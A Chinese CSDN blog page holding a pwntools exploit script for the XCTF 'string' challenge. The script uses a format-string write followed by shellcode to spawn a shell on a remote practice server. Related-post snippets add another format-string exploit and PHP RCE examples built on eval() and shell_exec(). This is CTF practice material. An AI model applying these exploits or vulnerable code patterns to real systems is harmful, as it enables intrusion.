xctf string

最新推荐文章于 2022-08-01 18:31:12 发布
原创 最新推荐文章于 2022-08-01 18:31:12 发布 · 279 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 

from pwn import *

#p = process('./string')
p = remote("220.249.52.133",37754)
p.recvuntil('secret[0] is ')
addr = int(p.recv(7),16)
log.sucess(hex(addr))
p.recvuntil("name be:\n")
p.sendline('test')
p.recvuntil('east or up?:\n')
p.sendline('east')
p.recvuntil(' leave(0)?:\n')
p.sendline('1')
p.recvuntil("'Give me an address'\n")
#gdb.attach(p,'b *0x400C43')
p.sendline(str(addr))
p.recvuntil('And, you wish is:\n')

#gdb.attach(p,'b *0x400C7E')
p.sendline('%085c%7$n')
p.recvuntil('I will help you! USE YOU SPELL')
p.sendline(asm(shellcraft.amd64.linux.sh(),arch="amd64"))
p.interactive()

 

string(xctf)
weixin_43868725的博客
05-06 411
0x0 程序保护和流程 保护: 流程: main() 将v3变量的地址赋值给v4,输出v3和v3+4的地址。调用sub_400D72(v4)。 sub_400D72() 如果名字长度小于12就分别调用三个函数。 sub_400A7D() 如果输入east就会返回,否则就会进入sub_4009DD(),然后无论如何都会结束程序。 sub_400BB9() 输入east之后就会进入这个函数。...
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 4280
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
xctf-pwn 之string
neuisf的博客
12-29 906
此题未解出来,参考writeup后总结如下。 解题思路: 漏洞点在"give me a address“处,通过IDA反编译后,F5生成C伪代码,分析数据流,发现运行shellcode的条件:*a1==a1[1]。a1为整形指针(见函数参数声明),指向secret 0,a1[1]指向secret 1(见main函数)。通过格式化字符串任意地址写入漏洞使之相等,再利用pwntool...
string 格式化字符串漏洞 xctf
qq_62539372的博客
04-07 3583
借着这道题了解一下格式化字符串漏洞 查看一下保护 放进64位的IDA分析一下程序 这道题涉及C语言的指针 好好学C main() 分析得v3=v4 v4(v3) 8ull 前四位是68 后四位85 执行sud_400D72() 传的参数是v4 继续执行 分析一下 输入 个名字 不能太长 然后east 1 关键的部分来了 print(&format,&format)格式化字符串漏洞 给我个地址 就是第一个秘密 (好好思考一下 关键是悟) 把85传进去 看一下是第几个参数呢
XCTF|PWN-string-WP
l2645470582_的博客
08-07 332
1、下载文件并开启靶机 2、在Linux中查看文件信息 checksec 5 我们看到: 1.该文件是64位的文件 2.启用了nx 3、用命令运行程序 seccomp-tools dump ./5 我们会发现一个图案 继续往下翻 we are wizard, we will give you hand, you can not defeat dragon by yourself ... we will tell you two secret ... ...
XCTF_MOBILE13_基础android
一个热爱逆向,喜爱学习、分享的猿。
03-15 2770
初探 附件为一个apk,在模拟器里安装一下: 运行后,主界面很简单,一个输入框,一个按钮: 随便输入一个字符串,点击按钮,提示错误: 从使用上只有这些信息,接下来反编译看一看。 MainActivity 使用jadx打开apk,进行反编译。 先看MainActivity类,代码不多,可以轻松找到其中的按钮事件响应函数: this.login.setOnClickListener(new View.OnClickListener() { public voi...
XCTF逆向题-no-strings-attached
天璇星
11-25 439
下载,IDA打开,找到main函数: 每个函数点开看一下,发现authenticate最复杂: 看了下unk_8048B44和BA4,分别提示成功和失败,看来关键就在ws和s2上。 注意到有一句s2 = decrypt(&s, &dword_8048A90); 打开decrypt,发现是一个简单的置换函数,第一个入参逐个字节减第二个入参,第二个入参循环。 回到前一个函数,看一下给decrypt的两个入参都是什么,然后写python..
xctf攻防世界 Web高手进阶区 web2
l8947943的博客
08-01 8881
base64_encode(string)使用MIMEbase64对数据进行编码。substr(string,start,length)返回字符串的一部分。如果把已编码的字符串作为参数,那么将返回原始字符串。str_rot13(string)对字符串执行ROT13编码。ord(string)返回字符串首个字符的ASCII值。chr()从指定的ASCII值返回对应的字符。strlen(string)返回字符串的长度。string所需要的字符串。......
攻防世界xctf reverse:no-strings-attached
prettyX的博客
11-24 902
先查基本信息,ELF程序,无壳 尝试运行 拽入IDA中,shift F12未发现有价值信息,F5 经过查看,authenticate()为重要函数,通过下面代码分析,S2即为我们需要的flag s2是由decrypt()函数产生的,来看一下decrypt()函数 查看汇编代码,decrypt的返回值在eax中 gdb动态调试,在decrypt()处下断点,随后读取eax中的值,获取s2 查看.text段的函数 objdump -t -j .text 554e0...
XCTF(攻防世界)—新手web题Write Up
Lemon's blog
07-10 2926
前言:之前一直没有接触过web这方面的题,这次利用暑假时光好好学习,web真的是很有趣,虽然有的题很简单,但可以学习到很多知识,话不多说,做题。
格式化字符串漏洞_【XCTFpwn】用一道题目来领略“格式化字符串漏洞”的危害...
weixin_39885412的博客
12-09 409
0x00 前言在上一篇“详解格式化字符串漏洞”中已经很详细的阐述格式化字符串漏洞的原理以及如何构造payload,并且用例子进一步的说明了格式化字符串漏洞的危害,今天我们就以XCTF中的string题目为例,再次感受一下格式化字符串漏洞的实际危害。在写这篇文章之前,我已经在网上查了相关的writeup,虽然很多人将这道题目解了出来,并写了相关的writeup发在网上,但是我在...
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4515
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
xctf社区题解1
Spwpun的博客
03-30 3355
web-新手模式: view-source: 鼠标右键被网页禁用了吧,F12查看即可: get_post: 提交之后,显示: robots: 访问robots.txt,发现f1ag_1s_h3re.php页面: 访问f1ag_1s_h3re.php页面: backup: 常见的备份文件后缀名有:.git .svn .swp .~ .bak .bash_history,访问提示如下: ...
XCTF-攻防世界 CGfsb 格式化字符串漏洞
river
07-02 4310
攻防世界-CGfsb-格式化字符串漏洞 参考自 http://geekfz.cn/index.php/2019/06/12/pwn-format/ 程序拿下来丢到IDA F5 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; ...
noxCTF-pwn1-格式化字符串
Peanuts
09-09 650
格式化字符串 额额博客爆炸。。之前写的都没了懒得再写一遍了太坑了这博客就发个wp吧,过程就是远程泄漏ret地址,因为没有开alsr from pwn import * context.log_level='debug' elf = ELF('./believeMe.dms') libc = elf.libc p = remote('18.223.228.52',13337) #p = pr...
XCTF-高手进阶区:mfw
1stPeak's Blog
06-13 4277
XCTF-高手进阶区-第三题:mfw 目标: 学习git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 会简单构造php的payload 了解urlencode Writeup (1)我们在http://111.198.29.45:46634/?page=about页面看到如下图...
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
[第五空间2019 决赛]PWN5
pondzhang的专栏
04-27 856
from pwn import * #p = process('./pwn') p = remote("node3.buuoj.cn",25955) addr_unk_804C044 = 0x0804C044 payload = fmtstr_payload(10,{addr_unk_804C044:0x01}) p.sendlineafter('your name:',payload) p.se...
buuoj BJDCTF 2nd r2t3
pondzhang的专栏
03-26 762
buf定义长度为0x400。而buf的长度为0x408 所以不存在溢出。 可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...
xctf新手web php-rce
最新发布
03-21
### XCTF Web 类 PHP RCE 漏洞利用新手教程 #### 背景介绍 PHP远程代码执行(Remote Code Execution, RCE)漏洞通常允许攻击者通过特定输入在服务器上运行任意命令。这种类型的漏洞常见于未正确过滤用户输入的情况下调用了危险函数,例如 `eval()`、`assert()` 或反序列化操作等[^1]。 #### 常见的PHP RCE触发方式 以下是几种常见的PHP RCE触发机制及其原理: 1. **Eval 函数滥用** 当应用程序使用 `eval()` 来动态执行字符串形式的PHP代码时,如果该字符串来源于不可信的用户输入,则可能导致RCE漏洞的发生。例如: ```php <?php $input = $_GET['code']; eval($input); ?> ``` 上述代码片段中,任何传入到参数 `code` 的数据都会被当作PHP脚本执行[^2]。 2. **系统命令注入** 如果程序错误地将未经验证的数据传递给诸如 `exec()`, `shell_exec()`, `passthru()`, 和 `system()` 这样的函数,也可能引发类似的后果。 3. **对象反序列化问题** 反序列化的风险在于它可能恢复恶意构造的对象实例,从而操纵内部逻辑或者访问敏感资源。比如当开发者依赖自定义魔术方法(`__wakeup`, `__destruct`)来处理复杂状态转换的时候特别需要注意安全性设计缺陷带来的隐患。 #### 解决方案与防护措施建议 为了防止此类安全事件发生,在开发过程中应该遵循最佳实践原则并采取必要的防御手段: - 避免完全信任来自外部环境的信息流; - 对所有进入系统的变量实施严格的白名单校验策略而非黑名单排除法; - 替代高危内置功能以更稳健的方式实现相同业务需求; - 定期审查现有架构是否存在潜在弱点并通过单元测试加以确认其健壮程度。 #### 示例代码分析 下面给出一段可能存在安全隐患的实际应用例子以及如何修复它的办法: 假设有一个简单的留言板服务端接口如下所示: ```php <?php if(isset($_POST["cmd"])){ shell_exec($_POST["cmd"]); } ?> ``` 这段原始版本很容易遭受非法操控因为直接把客户端提交过来的内容作为操作系统指令去执行没有任何保护机制存在其中。我们可以通过修改后的版本展示改进之处: 修正版一:采用预定义选项列表限制可选动作范围 ```php <?php $allowed_commands=['ls','-la','pwd'];//仅允许列举目录结构查看当前路径两项基本查询行为 $input=trim(filter_input(INPUT_POST,'cmd',FILTER_SANITIZE_STRING)); if(in_array($input,$allowed_commands)){ echo shell_exec($input); }else{ die('Invalid Command'); } ?> ``` 修正版二:运用正则表达式匹配限定字符集构成合法请求模式 ```php <?php $pattern='/^[a-zA-Z0-9\s]+$/'; //只接受字母数字空白符组成的简单语句 $input=filter_input(INPUT_POST,'cmd',FILTER_DEFAULT); if(preg_match($pattern,$input)){ echo escapeshellarg(shell_exec($input)); } else { die('Malformed Input Detected!'); } ?> ``` 以上两种不同的改写方向均能有效降低原生脆弱性的暴露概率同时兼顾功能性保留部分必要交互能力满足实际场景下的平衡考量。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值